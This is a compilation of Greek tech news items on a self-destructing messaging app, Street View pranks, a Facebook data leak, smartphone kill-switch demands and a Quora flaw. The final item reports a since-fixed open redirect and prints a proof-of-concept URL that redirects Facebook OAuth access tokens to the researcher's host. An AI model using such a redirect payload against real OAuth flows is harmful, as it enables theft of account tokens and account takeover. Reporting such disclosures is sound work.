Privatext, νέα messaging εφαρμογή για iOS που αυτοκαταστρέφει τα μηνύματά σου

Με αφορμή τα όσα συνέβησαν με το PRISM, την εμφάνιση της έκανε μια νέα εφαρμογή για iOS συσκευές ονόματι Privatext που υπόσχεται να προστατεύσει την ιδιωτικότητα των χρηστών της.

Κάνοντας χρήση end-to-end κρυπτογράφησης το Privatext διαγράφει αυτόματα τα μηνύματα κειμένου ή φωτογραφιών από τις συσκευές του αποστολέα και του παραλήπτη αλλά και από τους servers της εφαρμογής είτε αμέσως μετά την αποστολή/ανάγνωση είτε σε ένα προκαθορισμένο χρονικό περιθώριο.

Μια ακόμα εξαιρετικά χρήσιμη δυνατότητα που προσφέρει είναι η διαγραφή περιεχομένου προτού ο παραλήπτης προλάβει να το λάβει (σε περίπτωση που αλλάξεις γνώμη εγκαίρως), κάτι που δεν υπάρχει στις παραδοσιακές εφαρμογές μηνυμάτων.

Τέλος, με το  Privatext μπορείς να προστατεύσεις τα μηνύματα σου με έναν πρόσθετο κωδικό ασφαλείας και δε χρειάζεται καν να χρησιμοποιείς το πραγματικό σου όνομα. Μηνύματα, φωτογραφίες και λοιπό περιεχόμενο δεν αποθηκεύoνται στη συσκευή σου ενώ η εφαρμογή δεν έχει πρόσβαση στον τηλεφωνικό σου κατάλογο.

To Privatext μπορείς να κατεβάσεις από εδώ ενώ πολύ σύντομα θα είναι διαθέσιμο για Android, Windows Phone και BlackBerry συσκευές.

Πηγή: www.techgear.gr

Οι Ιάπωνες τρολάρουν το Google Street View

Σχεδόν όλος ο κόσμος γνωρίζει για το Google Street View (και στην Ελλάδα κάνουν συχνά την εμφάνισή τους τα αυτοκίνητα της Google) και πολύς κόσμος έχει το συνήθειο να τρολάρει. Είτε κάνοντας γκριμάτσες μπροστά στις κάμερες, είτε παίρνοντας αστείες πόζες, ελπίζοντας ότι θα εμφανιστούν οι φωτογραφίες αυτές στο Street View. Οι Ιάπωνες, όμως, συντάκτες του Daily Portal Z, ενός χιουμοριστικού site, έκαναν κάτι επικό. Φόρεσαν κουκούλες με σχήμα κεφαλιού περιστεριού και το αποτέλεσμα ήταν αυτό:

Ναι, αλήθεια. Και μπορείτε να διαπιστώσετε ότι «εμφανίστηκαν» ανθρωπόμορφα περιστέρια στο Τόκυο, στο Street View εδώ.

Η ιδέα δεν είναι καινούρια βέβαια. Οι συντάκτες του Daily Portal Z, έχουν ξαναντυθεί ανθρώπινα περιστέρια λίγους μήνες πριν, για να τρολάρουν τους κατοίκους του Τόκυο στους δρόμους και τα εστιατόρια της πόλης.

Φανταστικοί;

Πηγή: www.digitallife.gr

Σάλος στο Facebook: Διέρρευσαν στο Διαδίκτυο προσωπικά δεδομένα 6 εκατ. χρηστών του

Το Facebook εντόπισε μόλις την περασμένη εβδομάδα το σφάλμα εκείνο, το κενό ασφαλείας, το οποίο επέτρεψε τη διαρροή των προσωπικών στοιχείων, όπως διευθύνσεις e-mail και τηλέφωνά έξι εκατ. χρηστών του κοινωνικού δικτύου, περίπου, μέσα στον τελευταίο χρόνο.

Την Παρασκευή το Facebook ανακοίνωσε και επισήμως ότι ένα σφάλμα στο αρχείο δεδομένων είχε ως συνέπεια διευθύνσεις e-mail και αριθμοί τηλεφώνων χρηστών του Facebook να κοινοποιηθούν σε ανθρώπους που διαφορετικά δεν θα είχαν πρόσβαση στις πληροφορίες αυτές.

  «Δεν έχουμε καμία απόδειξη ότι αυτό το σφάλμα αξιοποιήθηκε για δόλιους σκοπούς και δεν έχουμε δεχθεί παράπονα από χρήστες, ούτε έχουμε δει ασυνήθιστη συμπεριφορά στην ιστοσελίδα που να παραπέμπει σε παράβαση», σημείωσε η ομάδα του Facebook στο μπλογκ της, προσθέτοντας ότι αν και το πρόβλημα ήταν περιορισμένο, «είναι κάτι για το οποίο είμαστε αναστατωμένοι και θα δουλέψουμε δύο φορές πιο σκληρά για να σιγουρέψουμε ότι κάτι τέτοιο δε θα συμβεί ξανά».

  Ωστόσο, το κοινωνικό δίκτυο τονίζει ότι οι συνέπειες ήταν μικρές, επειδή οι περισσότερες πληροφορίες ήταν ήδη γνωστές και πιθανότατα είχαν ήδη κοινοποιηθεί σε ανθρώπους που ήξεραν τα θύματα.

Πηγή: www.defencenet.gr

Διακόπτη που κάνει... «τούβλα» τα «έξυπνα» τηλέφωνα, απαιτείται στις ΗΠΑ

«Ελπίζουμε το Activation Lock να αποδειχτεί ουσιαστική λύση του προβλήματος», αναφέρει σε επίσημη επιστολή του ο διαχειριστής των εισφορών από ένα εκατομμύριο εργαζόμενους στο δημόσιο τομέα στην Νέα Υόρκη.

SOS εκπέμπουν οι Γενικοί Εισαγγελείς στις ΗΠΑ για την «επιδημία» κλοπών smartphone στις Ηνωμένες Πολιτείες που συνιστούν έως και το 40% όλων των ληστειών στην χώρα. Δικηγόροι, αστυνομικοί, και εκλεγμένοι πολιτικοί αξιωματούχοι συνασπίστηκαν και αναλαμβάνουν την πρωτοβουλία Secure Our Smartphones (SOS), με κύριο στόχο να πείσουν τους κατασκευαστές smartphone να αναπτύξουν τεχνολογία που θα καθιστά κυριολεκτικά άχρηστα τα κλεμμένα «έξυπνα» τηλέφωνα.

Αυτό που ζητούν οι επικεφαλής της προσπάθειας, Γενικοί Εισαγγελείς Εric Schneiderman και George Gascon σε Νέα Υόρκη και Σαν Φρανσίσκο αντίστοιχα, είναι να ενσωματωθεί το λεγόμενο kill switch σε κάθε smartphone. Ο διακόπτης... ευθανασίας όχι μόνο θα διασφαλίζει το απροσπέλαστο στα δεδομένα του χρήστη αλλά θα απενεργοποιεί το smartphone και θα το καθιστά κυριολεκτικά ένα (ελαφρύ) τούβλο που δεν θα μπορούσε να αποφέρει στους ληστές ούτε ένα σεντς στην μαύρη αγορά.

Η απενεργοποίηση με βάση το μοναδικό αναγνωριστικό, το λεγόμενο IMEI, έχει αποτύχει, σημειώνουν σε ανοικτή επιστολή που απευθύνουν όλα τα μέλη του SOS σε Google, Microsoft, Samsung Electronics και Apple. Τα όπλα που χρησιμοποιούν στην επιστολή αυτή για να ασκήσουν πίεση στους κατασκευαστές είναι το χαρτοφυλάκιο μετοχών των ασφαλιστικών ταμείων σε κάθε πολιτεία. Για παράδειγμα, το New York State Common Retirement Fund έχει μετοχές της Google με τρέχουσα αξία 711 εκατομμύρια δολάρια, της Microsoft αξίας 877 εκατομμυρίων δολαρίων, της Samsung Electronics αξίας 115 εκατομμυρίων και στην Apple 1,3 δισεκατομμυρίων δολαρίων, και με αυτό τον πρόλογο τους απευθύνει το σχετικό αίτημα ο διαχειριστής των κεφαλαίων αυτών, Thomas P. DiNapoli.


Σήμερα, οι χρήστες κινητών με Windows Phone μπορούν να χρησιμοποιήσουν υπηρεσίες εντοπισμού του κινητού τους. Ο χρήστης μπορεί να εντοπίσει ένα χαμένο ή κλεμμένο τηλέφωνο στον χάρτη, και χωρίς να το έχει στα χέρια του να το κάνει να κουδουνίσει, να το κλειδώσει με PIN και να ορίσει το μήνυμα που θα εμφανίζεται στην οθόνη του από απόσταση ή να διαγράψει τα πάντα (να το επαναφέρει σε εργοστασιακή κατάσταση, διαγράφοντας στοιχεία λογαριασμών και προσωπικό περιεχόμενο). Στα Windows Phone όλα αυτά γίνονται με την αποστολή SMS, επομένως όταν αφαιρεθεί από το τηλέφωνο η κάρτα SIM δεν υπάρχει ελπίδα για εντοπισμό του κινητού και αυτός δεν είναι ο μόνος τρόπος για να χάσει κανείς τα ίχνη του Windows Phone του.

• Find my Windows Phone

Όσοι εκπέμπουν SOS για τις κλοπές smartphone και τον κίνδυνο ακόμα και για την ανθρώπινη ζωή, εμφανίζονται εξαιρετικά δύσπιστοι απέναντι στην βιομηχανία. Οι κατασκευαστές βολεύονται από τις κλοπές, υποστηρίζουν οι επικριτές τους, αφού αυξάνουν τις πωλήσεις τους αλλά και τον αριθμό κατόχων smartphone για τις υπηρεσίες τους. Αυτή η υποψία αναφέρεται στην επίσημη επιστολή ως βλαπτική για την φήμη των εταιρειών και τα συμφέροντα των μετόχων.

Μάλιστα ο Γενικός Εισαγγελέας του Σαν Φρανσίσκο αναφέρθηκε στην στάση της Apple, η οποία τον Ιανουάριο του απάντησε ότι δεν μπορεί να υπάρξει "kill switch" και αντιμετώπισε με επιφύλαξη νεότερη διαβεβαίωση ότι η εταιρεία εργάζεται πάνω σε κάτι τέτοιο για τα iPhone. Όπως είπε χαρακτηριστικά ο George Gascon «...είναι ευχάριστο το γεγονός ότι μέσα σε έξι μήνες, η Apple αναθεώρησε την στάση της. Η βιομηχανία έχει υποχρέωση απέναντι στην κοινωνία να λύσει αυτό το πρόβλημα».

• Find my iPhone

Στην πρόσφατη παρουσίαση του iOS 7, η Apple αναφέρθηκε στην βελτιωμένη λειτουργία Find my iPhone: κανείς δεν μπορεί να απενεργοποιήσει την λειτουργία Find my iPhone χωρίς το Apple ID και το password του κατόχου, το μήνυμα του κατόχου (π.χ. αυτό το τηλέφωνο έχει χαθεί, καλέστε με στο ....) μπορεί να συνεχίσει να εμφανίζεται ακόμα και μετά την διαγραφή του τηλεφώνου. Κυρίως, στο βελτιωμένο Find My iPhone, Apple ID και password απαιτούνται για την ενεργοποίηση εκ νέου ενός κλεμμένου iPhone, δηλαδή «το iPhone παραμένει το δικό σας iPhone», αναφέρει χαρακτηριστικά η Apple.

Αυτές ή κάποιες από αυτές τις δυνατότητες υπάρχουν, τουλάχιστον σε κάποιες χώρες όπου διατίθεται το iPhone, όταν το κλεμμένο iPhone είναι συνδεδεμένο στο Διαδίκτυο μέσω Wi-Fi ή δικτύου κινητής τηλεφωνίας. Ωστόσο, στην επιστολή των αμερικανικών αρχών προς την Apple εκφράζεται επιφύλαξη για το εάν είναι πράγματι kill switch οι βελτιώσεις στο Find My iPhone που θεωρητικά, καθιστά ανέφικτη την ενεργοποίηση ενός απενεργοποιημένου iPhone ακόμα και όταν το κλεμμένο τηλέφωνο είναι κλειστό ή έχουν διαγραφεί τα πάντα από αυτό.


Εφαρμογές για τον εντοπισμό smartphone με Android υπάρχουν αρκετές στο Google Play Store και μάλιστα κάποιες δεν απαιτούν καν να υπάρχει κάρτα SIM στο τηλέφωνο για να λειτουργήσουν (π.χ. συνδυάζοντας το app Android Lost με το AndroidLost Jumpstart του Theis Borg). Ωστόσο, υπάρχουν μέθοδοι που καθιστούν αυτά τα app άχρηστα και φυσικά κάθε κλέφτης μπορεί να τις γνωρίζει (π.χ. εάν έχει γίνει επιστροφή στις εργοστασιακές ρυθμίσεις από τον κλέφτη δεν υπάρχει η δυνατότητα εγκατάστασης app από απόσταση).

Ανθή Παναγιωτάκη
@techingr

Πηγή : tech.in.gr

Κενό ασφάλειας στο Quora επιτρέπει την παραβίαση λογαριασμών του Facebook

O Iνδός ερευνητής ασφάλειας Prakhar Prasad ανακάλυψε μια ευπάθεια ανοιχτής ανακατεύθυνσης (Open Redirect) στο Quora, η οποία επιτρέπει την παραβίαση λογαριασμών του Facebook. Το Quora είναι μια social υπηρεσία με σκοπό την ανταλλαγή γνώσεων, όπου οι χρήστες δημιουργούν ερωτήσεις και λαμβάνουν απαντήσεις από την κοινότητα.
Το Quora επιτρέπει στους χρήστες να εγγραφούν στην υπηρεσία, μέσω του λογαριασμού τους στο Facebook. Κατά την εγγραφή ο ερευνητής παρατήρησε ότι η ιστοσελίδα είχε το δικαίωμα να λάβει το διακριτικό πρόσβασης (access token) από το OAuth του facebook, το οποίο και υπέκλεψε αξιοποιώντας ευπάθεια ανοικτής ανακατεύθυνσης. Με την χρήση του access token, ο ερευνητής μπορούσε να αποκτήσει πρόσβαση καθώς και τα πλήρη δικαιώματα σε οποιοδήποτε λογαριασμό του Facebook.
Ο κώδικας POC της ευπάθειας:
https://www.facebook.com/dialog/permissions.request?app_id=136609459636&next=https://www.quora.com/contacts/skip?goto=http://poc.prakharprasad.com/quora&response_type=token

Demo video:




Ο ερευνητής ενημέρωσε το Quora για την ευπάθεια, η οποία επιδιορθώθηκε άμεσα.

Πηγή : www.secnews.gr